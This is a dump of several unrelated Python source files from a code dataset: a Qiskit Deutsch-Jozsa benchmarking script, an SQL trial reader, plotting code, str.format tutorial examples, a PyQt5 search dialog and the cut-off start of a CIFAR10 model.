len(sys.argv) <= 2:\r\n\t\tprint('\\nLook in func.py for a function name to pass in as an argument, followed by the length of the bit string and the number of trials.\\nAlternatively, pass in the function name followed by \\'--graph\\' to create of graph of the scalability of the chosen function.\\nRefer to README for additional info.\\n')\r\n\t\texit(1)\r\n\tgraph = False\r\n\tif sys.argv[2] == '--graph':\r\n\t\tgraph = True\r\n\r\n\tfunc_in_name = sys.argv[1]\r\n\ttry:\r\n\t\tfunc_in = getattr(func, func_in_name)\r\n\texcept AttributeError:\r\n\t\traise NotImplementedError(\"Class `{}` does not implement `{}`\".format(func.__class__.__name__, func_in_name))\r\n\tsig = signature(func_in)\r\n\tif len(sig.parameters) != 1:\r\n\t\tprint('\\nSpecified function must only accept a single parameter: a bit string passed in as a Python list. Refer to README for additional info.\\n') \r\n\t\texit(1)\r\n\r\n\tif not graph:\r\n\t\tn = int(sys.argv[2])\r\n\t\ttrials = int(sys.argv[3])\r\n\t\tif len(sys.argv) > 4:\r\n\t\t\ttry:\r\n\t\t\t\toptimization_level = int(sys.argv[4])\r\n\t\t\t\tif optimization_level < 0 or optimization_level > 3:\r\n\t\t\t\t\tprint('\\nOptimization level must be an integer between 0 and 3, inclusive. Higher levels generate more optimized circuits, at the expense of longer transpilation time.\\n')\r\n\t\t\t\t\texit(1)\r\n\t\t\texcept:\r\n\t\t\t\tprint('\\nOptimization level must be an integer between 0 and 3, inclusive. Higher levels generate more optimized circuits, at the expense of longer transpilation time.\\n')\r\n\t\t\t\texit(1)\r\n\t\telse:\r\n\t\t\toptimization_level = 1\r\n\t\r\n\tif not graph:\r\n\t\tb = func_in([0]*n)\r\n\t\tU_f = get_U_f(func_in, n)\r\n\r\n\t\tcircuit = dj_program(U_f, n)\r\n\t\tcircuit.measure(range(n), range(n - 1, -1, -1))\r\n\r\n\t\t# Calibration matrix\r\n\t\tmeas_calibs, state_labels = complete_meas_cal(qubit_list=range(n), circlabel='mcal')\r\n\t\tjob = execute(meas_calibs, backend=backend, shots=8192)\r\n\t\tcal_results = job.result()\r\n\t\tmeas_fitter = CompleteMeasFitter(cal_results, state_labels, circlabel='mcal')\r\n\r\n\t\t# Time transpilation separately\r\n\t\tstart = time.time()\r\n\t\tcircuit = transpile(circuit, backend, optimization_level=optimization_level)\r\n\t\tend = time.time()\r\n\r\n\t\t# Account for more than 8192 trials\r\n\t\tif trials > 8192:\r\n\t\t\ttrials_list = [8192] * (trials // 8192) + [trials % 8192]\r\n\t\telse:\r\n\t\t\ttrials_list = [trials]\r\n\t\tjobs = []\r\n\t\tfor t in trials_list:\r\n\t\t\tjobs.append(execute(circuit, backend, optimization_level=0, shots=t))\r\n\t\tdelayed_results = []\r\n\t\tfor j in jobs:\r\n\t\t\tdelayed_results.append(backend.retrieve_job(j.job_id()).result())\r\n\t\tprint_results(func_in_name, circuit.size(), delayed_results, meas_fitter.filter, end - start, trials, n, b)\r\n\t\r\n\tif graph:\r\n\t\tsim_transpile_times = [[], [], [], []]\r\n\t\tsim_run_times = [[], [], [], []]\r\n\t\tsim_gates = [[], [], [], []]\r\n\t\tqc_transpile_times = [[], [], [], []]\r\n\t\tqc_run_times = [[], [], [], []]\r\n\t\tqc_gates = [[], [], [], []]\r\n\t\tqubits = []\r\n\t\t\r\n\t\t# if the no. of test qubits are specified\r\n\t\tif len(sys.argv) > 3:\r\n\t\t\tqubits = sorted(list(map(int, sys.argv[3:])))\r\n\t\t\r\n\t\t# default is test on n = 1,2,3\r\n\t\telse:\r\n\t\t\tqubits = [1,2,3]\r\n\t\t\r\n\t\tfor optimization_level in range(4):\r\n\t\t\tfor n_test in qubits:\r\n\t\t\t\t\tU_f = get_U_f(func_in, n_test)\r\n\r\n\t\t\t\t\tcircuit = dj_program(U_f, n_test)\r\n\t\t\t\t\tcircuit.measure(range(n_test), range(n_test - 1, -1, -1))\r\n\r\n\t\t\t\t\tstart = time.time()\r\n\t\t\t\t\t# gates available on IBMQX5\r\n\t\t\t\t\tcircuit = transpile(circuit, basis_gates=['u1', 'u2', 'u3', 'cx'], optimization_level=optimization_level)\r\n\t\t\t\t\tend = time.time()\r\n\t\t\t\t\tjob = execute(circuit, simulator, optimization_level=0, shots=1)\r\n\r\n\t\t\t\t\tsim_transpile_times[optimization_level].append(end - start)\r\n\t\t\t\t\tsim_run_times[optimization_level].append(job.result().time_taken)\r\n\t\t\t\t\tsim_gates[optimization_level].append(circuit.size())\r\n\r\n\t\t\t\t\tstart = time.time()\r\n\t\t\t\t\tcircuit = transpile(circuit, backend, optimization_level=optimization_level)\r\n\t\t\t\t\tend = time.time()\r\n\t\t\t\t\tjob = execute(circuit, backend, optimization_level=0, shots=1)\r\n\t\t\t\t\tdelayed_result = backend.retrieve_job(job.job_id()).result()\r\n\r\n\t\t\t\t\tqc_transpile_times[optimization_level].append(end - start)\r\n\t\t\t\t\tqc_run_times[optimization_level].append(job.result().time_taken)\r\n\t\t\t\t\tqc_gates[optimization_level].append(circuit.size())\r\n\r\n #for graphing, adjust array of qubit values to include the helper qubit\r\n\t\tfor i in range(len(qubits)):\r\n\t\t\tqubits[i] += 1\r\n\r\n\t\tfor optimization_level in range(4):\r\n\t\t\tfig, ax1 = plt.subplots()\r\n\t\t\tln11 = ax1.plot(qubits, sim_transpile_times[optimization_level], 'r', label=\"QASM simulator\")\r\n\t\t\tln12 = ax1.plot(qubits, qc_transpile_times[optimization_level], 'k', label=backend.name())\r\n\t\t\tax1.set_xlabel('Number of Qubits')\r\n\t\t\tax1.set_ylabel('Transpile time (sec)')\r\n\r\n\t\t\tax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\r\n\t\t\tax2.set_ylabel('Number of gates') # we already handled the x-label with ax1\r\n\t\t\tln21 = ax2.plot(qubits, sim_gates[optimization_level], 'b', label='QASM simulator')\r\n\t\t\tln22 = ax2.plot(qubits, qc_gates[optimization_level], 'g', label=backend.name())\r\n\r\n\t\t\tfig.tight_layout() # otherwise the right y-label is slightly clipped\r\n\t\t\tplt.legend(ln11 + ln12 + ln21 + ln22, ['QASM simulator transpile', backend.name() + ' transpile', 'QASM simulator #g', backend.name() + ' #g'], loc=0)\r\n\t\t\tplt.subplots_adjust(top=0.88)\r\n\r\n\t\t\tplt.suptitle('Transpile time scalability of Deutsch-Jozsa on %s\\n(optimization level = %d)' % (func_in_name, optimization_level))\r\n\t\t\tplt.savefig('deutsch_jozsa_transpile_scalability_%s_%dopt_{:%Y-%m-%d_%H-%M-%S}.png'.format(datetime.datetime.now()) % (func_in_name, optimization_level), fontsize=8)\r\n\r\n\t\t\t# ==========\r\n\r\n\t\t\tfig, ax1 = plt.subplots()\r\n\t\t\tln11 = ax1.plot(qubits, sim_run_times[optimization_level], 'r', label=\"QASM simulator\")\r\n\t\t\tln12 = ax1.plot(qubits, qc_run_times[optimization_level], 'k', label=backend.name())\r\n\t\t\tax1.set_xlabel('Number of Qubits')\r\n\t\t\tax1.set_ylabel('Run time (sec)')\r\n\r\n\t\t\tax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\r\n\t\t\tax2.set_ylabel('Number of gates') # we already handled the x-label with ax1\r\n\t\t\tln21 = ax2.plot(qubits, sim_gates[optimization_level], 'b', label='QASM simulator')\r\n\t\t\tln22 = ax2.plot(qubits, qc_gates[optimization_level], 'g', label=backend.name())\r\n\r\n\t\t\tfig.tight_layout() # otherwise the right y-label is slightly clipped\r\n\t\t\tplt.legend(ln11 + ln12 + ln21 + ln22, ['QASM simulator run', backend.name() + ' run', 'QASM simulator #g', backend.name() + ' #g'], loc=0)\r\n\t\t\tplt.subplots_adjust(top=0.88)\r\n\r\n\t\t\tplt.suptitle('Run time scalability of Deutsch-Jozsa on %s\\n(optimization level = %d)' % (func_in_name, optimization_level))\r\n\t\t\tplt.savefig('deutsch_jozsa_run_scalability_%s_%dopt_{:%Y-%m-%d_%H-%M-%S}.png'.format(datetime.datetime.now()) % (func_in_name, optimization_level), fontsize=8)\t\r\n\r\n\t\tfig, ax1 = plt.subplots()\r\n\t\tax1.set_xlabel('Qiskit optimization level')\r\n\t\tax1.set_ylabel('Transpile time (sec)')\r\n\t\tln11 = ax1.plot(range(4), [sim_transpile_times[i][-1] for i in range(4)], 'r', label='QASM simulator transpile')\r\n\t\tln12 = ax1.plot(range(4), [qc_transpile_times[i][-1] for i in range(4)], 'k', label=backend.name() + ' transpile')\r\n\r\n\t\tax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\r\n\t\tax2.set_ylabel('Run time (sec)') # we already handled the x-label with ax1\r\n\t\tln21 = ax2.plot(range(4), [sim_run_times[i][-1] for i in range(4)], 'b', label='QASM simulator run')\r\n\t\tln22 = ax2.plot(range(4), [qc_run_times[i][-1] for i in range(4)], 'g', label=backend.name() + ' run')\r\n\r\n\t\tfig.tight_layout() # otherwise the right y-label is slightly clipped\r\n\t\tplt.legend(ln11 + ln12 + ln21 + ln22, ['QASM simulator transpile', backend.name() + ' transpile', 'QASM simulator run', backend.name() + ' run'], loc=0)\r\n\t\tplt.subplots_adjust(top=0.88)\r\n\t\tplt.suptitle('Comparison of transpile and run times for Deutsch_Jozsa on %s\\n(%d qubits)' % (func_in_name, qubits[-1]))\r\n\t\tplt.savefig('deutsch_jozsa_run_transpile_comp_%s_{:%Y-%m-%d_%H-%M-%S}.png'.format(datetime.datetime.now()) % func_in_name, fontsize=8)\t\r\n","sub_path":"Qiskit-IBMQX/deutsch_jozsa.py","file_name":"deutsch_jozsa.py","file_ext":"py","file_size_in_byte":12588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"191831139","text":"from trialsfactory import TrialsFactory\nfrom utils.ConnectionUtils import DATABASE_PARAM, TABLE_PARAM, \\\n SQL_FOR_SELECTION, get_connection, COUNTER_START, \\\n TRIAL_PARAM, COUNTER_STEP, CLASS_PARAM, ACCOUNT_PARAM, \\\n MARK1_PARAM, MARK2_PARAM, MARK3_PARAM, SQL_PARAMS_NUMBER, is_table_exist\nfrom utils.ExceptionHandling import get_logger_, \\\n NOT_ENOUGH_PARAMETERS_SQL, TABLE_DOES_NOT_EXIST\nfrom utils.ReaderWriterConstants import DOT, READER_CONSTANT, \\\n CONFIG_CONSTANT\nfrom utils.TrialConstants import FINAL_TRIAL\n\n\nclass SqlTrialReader:\n logger = get_logger_()\n\n def __init__(self, *args):\n reader = args[READER_CONSTANT]\n configuration_file_name = args[CONFIG_CONSTANT]\n params = reader.split(DOT)\n if len(params) < SQL_PARAMS_NUMBER:\n raise ValueError(NOT_ENOUGH_PARAMETERS_SQL + reader)\n database_name = params[DATABASE_PARAM]\n table_name = params[TABLE_PARAM]\n if is_table_exist(configuration_file_name, database_name, table_name):\n self.SQL = SQL_FOR_SELECTION.format(table_name)\n self.counter = COUNTER_START\n self.connection = get_connection(configuration_file_name, database_name)\n self.cursor = self.connection.cursor(prepared=True)\n else:\n raise ValueError(TABLE_DOES_NOT_EXIST.format(database_name, table_name))\n\n def next_trial(self):\n self.cursor.execute(self.SQL, str(self.counter))\n trial = self.cursor.fetchall()\n if len(trial) > TRIAL_PARAM:\n self.counter += COUNTER_STEP\n return TrialsFactory.get_trial(trial[TRIAL_PARAM][CLASS_PARAM],\n trial[TRIAL_PARAM][ACCOUNT_PARAM],\n trial[TRIAL_PARAM][MARK1_PARAM],\n trial[TRIAL_PARAM][MARK2_PARAM],\n trial[TRIAL_PARAM][MARK3_PARAM])\n else:\n return FINAL_TRIAL\n\n def close(self):\n self.connection.close()\n","sub_path":"threads2/readers/SqlTrialReader.py","file_name":"SqlTrialReader.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"485532518","text":"#format基本操作\r\nprint(\"{}语言是世界上最{}的语言\".format(\"python\",\"好\"))\r\n#格式化字符串加大括号\r\nprint(\"{{{{python}}语言是{}最{}的语言}}\".format(\"世界上\",\"好\"))\r\n#{字段名!转换格式符}\r\na=\"{0!a}\".format(\"战狼2\")\r\nprint(a)\r\n#{字段名:格式规约}\r\na=\"{0:a>30,.2f}\".format(1234567.7654321)\r\nprint(a)\r\n#{字段名!转换格式符:格式规约}\r\na=\"{0!a:>30}\".format('战狼2')\r\nprint(a)\r\n\r\n#一、字段名\r\n#字段名是可以赋值的\r\na=\"{who}今年{age}岁了\".format(who=\"妈妈\",age=76)\r\nprint(a)\r\n#字段名也能这样混合用\r\na=\"{who}今年{}岁了\".format(76,who=\"妈妈\")\r\nprint(a)\r\n\r\n#重点:字段名可以使用集合、列表、字典类型\r\nfamilylist=[\"妈妈\",76]\r\na=\"{0[0]}今年{0[1]}岁了\".format(familylist)\r\nprint(a)\r\n\r\nfamilydict=dict(who=\"妈妈\",age=76)\r\na=\"{0[who]}今年{0[age]}岁了\".format(familydict)\r\nprint(a)\r\n\r\n#IDLE上测试表象形式和打印形式输出\r\nimport decimal\r\n#表象\r\ndecimal.Decimal(\"3.14159265\")\r\n#打印\r\nprint(decimal.Decimal(\"3.14159265\"))\r\n#不同格式输出不一定相同\r\nimport decimal\r\n\"{0}-{0!s}-{0!r}-{0!a}\".format(decimal.Decimal(\"3.14159265\"))\r\n\r\n#字符串格式化\r\ns=\"字符串格式化\"\r\n#默认格式化\r\n\"{0}\".format(s)\r\n#最小宽度30,右对齐\r\n\"{0:>30}\".format(s)\r\n#最小宽度30,居中对齐\r\n\"{0:^30}\".format(s)\r\n#最小宽度30,居中对齐,空格用-填充\r\n\"{0:-^30}\".format(s)\r\n#最小宽度30,左对齐,.填充\r\n\"{0:.<30}\".format(s)\r\n#最大宽度5\r\n\"{0:.5}\".format(s)\r\n# >>> print(len(\"{0:.5}\".format(s)))\r\n# >>>5\r\n\r\n#填充实例\r\n#用0填充,最小宽度12\r\n\"{0:0=12}\".format(1234567)\r\n#用a填充,最小宽度12\r\n\"{0:a=12}\".format(1234567)\r\n#用*填充,最小宽度12\r\n\"{0:*=12}\".format(1234567)\r\n\r\n#对齐实例\r\n#用*填充,最小宽度15,左对齐\r\n\"{0:*<15}\".format(1234567)\r\n#用*填充,最小宽度15,居中对齐\r\n\"{0:*^15}\".format(1234567)\r\n#用*填充,最最小宽度15,居中,负数\r\n\"{0:*^15}\".format(-1234567)#!负数符号占一个字符\r\n#用*填充,最小宽度15,右对齐\r\n\"{0:*<15}\".format(1234567)\r\n\r\n\r\n#符号字符实例\r\n#正号不变,负号用-\r\n\"[{0:}][{1:}]\".format(1234567,-1234567)\r\n#正号用空格,负号用-\r\n\"[{0: }][{1: }]\".format(1234567,-1234567)\r\n#正号用+,负号用-<强制使用符号>\r\n\"[{0:+}][{1:+}]\".format(1234567,-1234567)\r\n#输出结果和第一种类似\r\n\"[{0:-}][{1:-}]\".format(1234567,-1234567)\r\n\r\n#类型字符实例\r\n\"[{0:#b}] [{0:#o}] [{0:#x}] [{0:#X}]]\".format(12345678)\r\n#分别为:二进制、8进制、小写16进制和大写16进制\r\n\r\n#重点:,号分组实例\r\n\"[{0:,}] [{0:*>13,}]\".format(123456789)\r\n\r\n#指数形式和标准形式实例\r\n#最小宽度12,小数点后两位<第一个用e表示,第二个标准显示>\r\n\"[{0:12.2e}] [{0:12.2f}]\".format(123.456)\r\n#最小宽度12,小数点后2位,第一个用指数e形式表示,用*填充。\r\n\"[{0:*>12.2e}] [{0:*>12.2f}]\".format(1234.4321)\r\n#最小宽度12,小数点后2位,第一个用指数e形式表示,用*填充,强制使用符号\r\n\"[{0:*>+12.2e}] [{0:*>+12.2f}]\".format(1234.4321)\r\n\r\n#类格式化重写\r\nformat(75.2222,\".2f\")\r\n\r\n#时间日期特例(使用第三方库)\r\nfrom datetime import datetime\r\n\"{:%Y-%m-%d %H:%M}\".format(datetime(2018,2,3,4,5))\r\n#打印结果:'2018-02-03 04:05'\r\n\r\n#关于中文字符无法对齐问题\r\n\"\"\"\r\n中文字符在字符占用上相当于两个英文字符,\r\n但是字体设计上,一般一个中文字符的宽度不会等于两个英文字符的宽度\r\n,所以打印出来的效果有偏差\r\n\"\"\"\r\nc=[\r\n\"山\",\r\n\"山\"\"山\",\r\n\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\"\"山\"\"山\"\"山\",\r\n]\r\nprint(\"-----正常字符串格式化------\")\r\nfor x in range(len(c)):\r\n print(\"|%20s|\"%c[x])\r\n'''\r\n打印结果不整齐:\r\n| 山|\r\n| 山山|\r\n| 山山山|\r\n| 山山山山|\r\n| 山山山山山|\r\n| 山山山山山山|\r\n| 山山山山山山山|\r\n'''\r\n\r\n\r\n#但是等宽字符一个中文字体的宽度刚好等于两个英文字符宽度。\r\n#我们可以根据这个,自动计算字符串的长度。\r\n\r\nc=[\r\n\"山\",\r\n\"山\"\"山\",\r\n\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\"\"山\"\"山\"\"山\"\r\n]\r\n#自定义chinese占位函数\r\ndef chinese(data):\r\n count=0\r\n for s in data:\r\n if ord(s)>127:\r\n count+=1\r\n return count\r\n\r\nprint(\"-----通过函数计算长度格式化------\")\r\nfor x in range(len(c)):\r\n number=chinese(c[x])\r\n newStr='{0:{wd}}'.format(c[x],wd=20-number)\r\n print('|%s|'%newStr)\r\n","sub_path":"study_format.py","file_name":"study_format.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"350479831","text":"# Betty > dialogs > search.py\n\nfrom PyQt5.QtGui import (QTextDocument,\n QTextCharFormat,\n QIcon)\n\nfrom PyQt5.QtCore import (QDate,\n QStringListModel,\n Qt,\n QSettings,\n QSize,\n QPoint)\n\nfrom PyQt5.QtWidgets import (QLabel,\n QLineEdit,\n QPushButton,\n QComboBox,\n QCheckBox,\n QDateEdit,\n QTextEdit,\n QSpinBox,\n QGridLayout,\n QDialog,\n QHBoxLayout,\n QVBoxLayout,\n QGroupBox,\n QCalendarWidget,\n QCompleter)\n\nfrom resources.constants import (SEARCH_SPECIAL,\n SEARCH_TEMPLATE,\n ARTWORK_TOOLTIP,\n IMAGE_TOOLTIP,\n WITH_ARTWORK,\n WITH_IMAGE,\n GOOGLE_DEFAULT,\n GOOGLE_TAT,\n ABBOTT_TAT,\n UN_TAT,\n GE_TAT,\n STYLE)\n\n\n# Main dialog for searching template\nclass Search(QDialog):\n\n def __init__(self, parent=None):\n super(Search, self).__init__(parent)\n\n # resident variables\n self.date_format = 'd MMM yyyy'\n self.due_date = QDate.currentDate()\n self.today = QDate.currentDate()\n self.selected_TAT = ''\n self.artwork = ''\n self.image = ''\n self.special_ins = ''\n self.client_TAT = ''\n self.DEFAULT_SI = ''\n\n # TEST: trying to implement QCompleter here\n self.suggested_markers_model = QStringListModel()\n self.suggested_markers_model.setStringList([\"bapples\", \"banana\", \"apple\", \"orange\", \"amazing\"])\n self.tracker_completer = QCompleter()\n self.tracker_completer.setModel(self.suggested_markers_model)\n self.tracker_completer.setCaseSensitivity(Qt.CaseInsensitive)\n\n # resident functions\n self._widgets()\n self._layout()\n self._properties()\n self._connections()\n self._readSettings() # read current state of this dialog\n\n def _widgets(self):\n \"\"\" Create new PyQt widgets here \"\"\"\n\n self.trackerLineEdit = QLineEdit()\n self.clientLabel = QLabel(\"Client:\")\n self.clientComboBox = QComboBox()\n # TODO: you need a freaking list to hold your growing clients :)\n self.clientComboBox.insertItem(0, \"Abbott\")\n self.clientComboBox.insertItem(1, \"GE\")\n self.clientComboBox.insertItem(2, \"Google\")\n self.clientComboBox.insertItem(3, \"Unilever\")\n self.clientComboBox.setCurrentText(\"Unilever\")\n self.due_dateLabel = QLabel(\"Due Date:\")\n self.importanceLabel = QLabel(\"Select Importance:\")\n self.special_instructionLabel = QLabel(\"Special Instruction:\")\n self.due_dateDateEdit = QDateEdit(QDate.currentDate()) # initialize by current date\n self.defaultCalendar = QCalendarWidget()\n self.currentDateFormat = QTextCharFormat()\n self.currentDateFormat.setFontWeight(75)\n self.daysSpinBox = QSpinBox()\n self.importanceComboBox = QComboBox() # provide a list when using this widget for it's content\n self.importanceComboBox.insertItem(0, \"Low/Medium\")\n self.importanceComboBox.insertItem(1, \"Critical\")\n self.importanceComboBox.setCurrentIndex(0)\n self.with_artworkCheckBox = QCheckBox(\"With Artwork\")\n self.with_imageCheckBox = QCheckBox(\"With Image\")\n self.special_instructionLineEdit = QLineEdit()\n self.previewLabel = QLabel(\"Preview:\")\n self.previewTextEdit = QTextEdit()\n self.previewButton = QPushButton(\"Pr&eview\")\n self.addButton = QPushButton(\"&Add\")\n self.addButton.setEnabled(False)\n self.clearButton = QPushButton(\"&Clear\")\n\n def _layout(self):\n \"\"\" Set and arrange PyQt widgets here \"\"\"\n\n # clientLabel + clientComboBox\n label_combobox_HBoxLayout = QHBoxLayout()\n label_combobox_HBoxLayout.addWidget(self.trackerLineEdit)\n label_combobox_HBoxLayout.addStretch()\n label_combobox_HBoxLayout.addWidget(self.clientLabel)\n label_combobox_HBoxLayout.addWidget(self.clientComboBox)\n\n label_dateEdit_tandem = QHBoxLayout()\n label_dateEdit_tandem.addWidget(self.due_dateLabel)\n label_dateEdit_tandem.addWidget(self.due_dateDateEdit)\n label_dateEdit_tandem.addWidget(self.daysSpinBox)\n\n label_comboBox_tandem = QHBoxLayout()\n label_comboBox_tandem.addWidget(self.importanceLabel)\n label_comboBox_tandem.addWidget(self.importanceComboBox)\n\n grid = QGridLayout() # widget ka pala\n grid.addLayout(label_dateEdit_tandem, 0, 0) # affected\n grid.addWidget(self.with_artworkCheckBox, 0, 2)\n grid.addLayout(label_comboBox_tandem, 1, 0) # affected\n grid.addWidget(self.with_imageCheckBox, 1, 2)\n grid.addWidget(self.special_instructionLabel, 2, 0)\n grid.addWidget(self.special_instructionLineEdit, 3, 0, 1, 3)\n\n input_fieldsGroupBox = QGroupBox(\"Set Criteria\")\n input_fieldsGroupBox.setLayout(grid)\n\n # Arrange vertically\n center = QVBoxLayout()\n center.addLayout(label_combobox_HBoxLayout)\n center.addWidget(input_fieldsGroupBox)\n center.addWidget(self.previewLabel)\n center.addWidget(self.previewTextEdit)\n\n # Layout buttons\n buttons = QHBoxLayout()\n buttons.addStretch()\n buttons.addWidget(self.previewButton)\n buttons.addWidget(self.addButton)\n buttons.addWidget(self.clearButton)\n\n # add layout to the group\n center.addLayout(buttons)\n\n # set main layout for Search\n self.setLayout(center)\n\n def _properties(self):\n \"\"\" Set properties of PyQt widgets here \"\"\"\n\n self.trackerLineEdit.setPlaceholderText(\"Marker\")\n self.trackerLineEdit.setFrame(False)\n self.trackerLineEdit.setCompleter(self.tracker_completer)\n self.due_dateDateEdit.setDisplayFormat(self.date_format) # ex. 14 Mar 2015\n self.due_dateDateEdit.setCalendarPopup(True)\n self.due_dateDateEdit.setCalendarWidget(self.defaultCalendar)\n self.defaultCalendar.setGridVisible(True)\n self.defaultCalendar.setDateTextFormat(QDate.currentDate(), self.currentDateFormat)\n self.special_instructionLineEdit.setPlaceholderText(\"Read correspondence for further instructions\")\n self.with_artworkCheckBox.setToolTip(ARTWORK_TOOLTIP)\n self.with_imageCheckBox.setToolTip(IMAGE_TOOLTIP)\n # You need this to style self.previewTextEdit\n style_document = QTextDocument()\n style_document.setDefaultStyleSheet(STYLE)\n # Apply style\n self.previewTextEdit.setDocument(style_document)\n #self.setAttribute(Qt.WA_DeleteOnClose)\n #self.setWindowModality(Qt.NonModal)\n\n # set default TAT values\n self.client_TAT = UN_TAT\n\n # TEST: see line 37\n self.selected_TAT = UN_TAT['Low/Medium'] # set default\n\n # For the main window\n self.setWindowTitle(\"Search (SIW) Template Form\")\n self.setWindowIcon(QIcon(':/magnify_32.png'))\n\n def _readSettings(self):\n\n settings = QSettings(\"SEARCHING\", \"search_dialog\")\n position = settings.value(\"position\", QPoint(200, 200))\n size = settings.value(\"size\", QSize(410, 550))\n self.move(position)\n self.resize(size)\n\n def _writeSettings(self):\n\n settings = QSettings(\"SEARCHING\", \"search_dialog\")\n settings.setValue(\"position\", self.pos())\n settings.setValue(\"size\", self.size())\n\n def _connections(self):\n \"\"\" Connect every PyQt widgets here \"\"\"\n\n self.clientComboBox.activated.connect(self.on_clientComboBox_activated)\n self.due_dateDateEdit.dateChanged.connect(self.on_due_dateDateEdit_dateChanged)\n self.daysSpinBox.valueChanged.connect(self.on_daysSpinBox_valueChanged)\n self.importanceComboBox.activated.connect(self.on_importanceComboBox_activated)\n self.with_artworkCheckBox.stateChanged.connect(self.on_with_artworkCheckBox_stateChanged)\n self.with_imageCheckBox.stateChanged.connect(self.on_with_imageCheckBox_stateChanged)\n self.previewButton.clicked.connect(self.on_previewButton_clicked)\n # The generate button will only retrieve and throw data based on the input widgets\n self.addButton.clicked.connect(self.accept)\n self.clearButton.clicked.connect(self.on_clearButton_clicked)\n\n # TEST: event handling for self.dueDateEdit.dateChanged\n def on_due_dateDateEdit_dateChanged(self):\n \"\"\" Event handler for self.due_dateDateEdit\n\n return QDate\n \"\"\"\n\n # Get any selected date when the user uses the calendar\n self.due_date = self.due_dateDateEdit.date()\n return self.due_date\n\n def dialog_info(self):\n \"\"\" Dialog information identifier \"\"\"\n\n return 'Searching'\n\n # EVENT HANDLING starts here...\n def on_clientComboBox_activated(self):\n \"\"\" Event handler for self.clientComboBox \"\"\"\n\n # TODO: Ok, you see a pattern here. You know what to do with this un-pythonic block of conditions!\n if self.clientComboBox.currentText() == 'GE':\n self.DEFAULT_SI = \"\"\n self.client_TAT = GE_TAT\n self.selected_TAT = GE_TAT[self.importanceComboBox.currentText()]\n elif self.clientComboBox.currentText() == 'Google':\n self.DEFAULT_SI = GOOGLE_DEFAULT\n self.client_TAT = GOOGLE_TAT\n self.selected_TAT = GOOGLE_TAT[self.importanceComboBox.currentText()]\n elif self.clientComboBox.currentText() == 'Unilever':\n self.DEFAULT_SI = \"\"\n self.client_TAT = UN_TAT\n self.selected_TAT = UN_TAT[self.importanceComboBox.currentText()]\n elif self.clientComboBox.currentText() == 'Abbott':\n self.DEFAULT_SI = \"\"\n self.client_TAT = ABBOTT_TAT\n self.selected_TAT = ABBOTT_TAT[self.importanceComboBox.currentText()]\n else:\n pass\n\n def on_importanceComboBox_activated(self):\n \"\"\" Event handler for self.importanceComboBox \"\"\"\n\n # Get selected importance\n importance = self.importanceComboBox.currentText()\n\n # Check what the user choose\n if importance == 'Low/Medium':\n self.selected_TAT = self.client_TAT[importance]\n elif importance == 'Critical':\n self.selected_TAT = self.client_TAT[importance]\n else:\n print('BET: unsual - no importance selected?')\n\n def on_with_artworkCheckBox_stateChanged(self):\n \"\"\" Event handler for self.with_artworkCheckBox \"\"\"\n\n if self.with_artworkCheckBox.isChecked():\n self.artwork = WITH_ARTWORK\n else:\n self.artwork = ''\n\n def on_with_imageCheckBox_stateChanged(self):\n \"\"\" Event handler for with_imageCheckBox \"\"\"\n\n if self.with_imageCheckBox.isChecked():\n self.image = WITH_IMAGE\n else:\n self.image = ''\n\n def on_daysSpinBox_valueChanged(self):\n\n self.due_date = self.today.addDays(self.daysSpinBox.value())\n\n def on_previewButton_clicked(self):\n \"\"\" Preview the user's input inside the self.previewTextEdit \"\"\"\n\n # Check if special_instructionLineEdit has content\n if self.special_instructionLineEdit.text():\n self.special_ins = SEARCH_SPECIAL.format(self.special_instructionLineEdit.text())\n else:\n self.special_ins = ''\n\n # Consolidate anything :)\n self.html = SEARCH_TEMPLATE.substitute(default=self.DEFAULT_SI,\n special=self.special_ins,\n artwork=self.artwork,\n TAT=self.selected_TAT.format(self.due_date.toString(self.date_format)),\n image=self.image)\n\n # Show output\n self.previewTextEdit.setHtml(self.html.strip())\n\n # Enable self.addButton\n self.addButton.setEnabled(True)\n\n def on_clearButton_clicked(self):\n \"\"\" Event handler for clearing text inside self.special_instructionLineEdit and self.previewTextEdit \"\"\"\n\n self.special_instructionLineEdit.clear()\n self.previewTextEdit.clear()\n\n # OVERRIDING: starts here\n def accept(self):\n\n self._writeSettings()\n self.done(1)\n\n def keyPressEvent(self, event):\n\n if event.key() == Qt.Key_Escape:\n self._writeSettings()\n self.close()\n\n def closeEvent(self, event):\n\n self._writeSettings()\n","sub_path":"src/dialogs/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":13213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"301710329","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv(\"dataset.csv\")\ndel df[\"Date\"]\n\ncolors = [\"green\", \"red\", \"blue\", \"orange\", \"purple\", \"black\", \"yellow\", \"brown\"]\ncounter = 0\nfor i in df.columns[1:]:\n plt.figure(figsize=(20, 5))\n plt.plot(df[\"Calories\"].sort_values(), df[i].sort_values(), color = colors[counter])\n plt.title(i)\n plt.ylabel(i)\n plt.xlabel(\"Calories\")\n plt.show()\n counter+=1\n","sub_path":"aashna/multipleGraphs.py","file_name":"multipleGraphs.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"6501539","text":"import torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\nimport random\r\nimport pickle\r\nfrom torchvision import datasets\r\nfrom torchvision import transforms\r\nimport torch.nn.functional as F\r\nfrom sklearn.decomposition import PCA\r\n\r\n\r\nclass CIFAR10(nn.Module):\r\n def __init__(self):\r\n 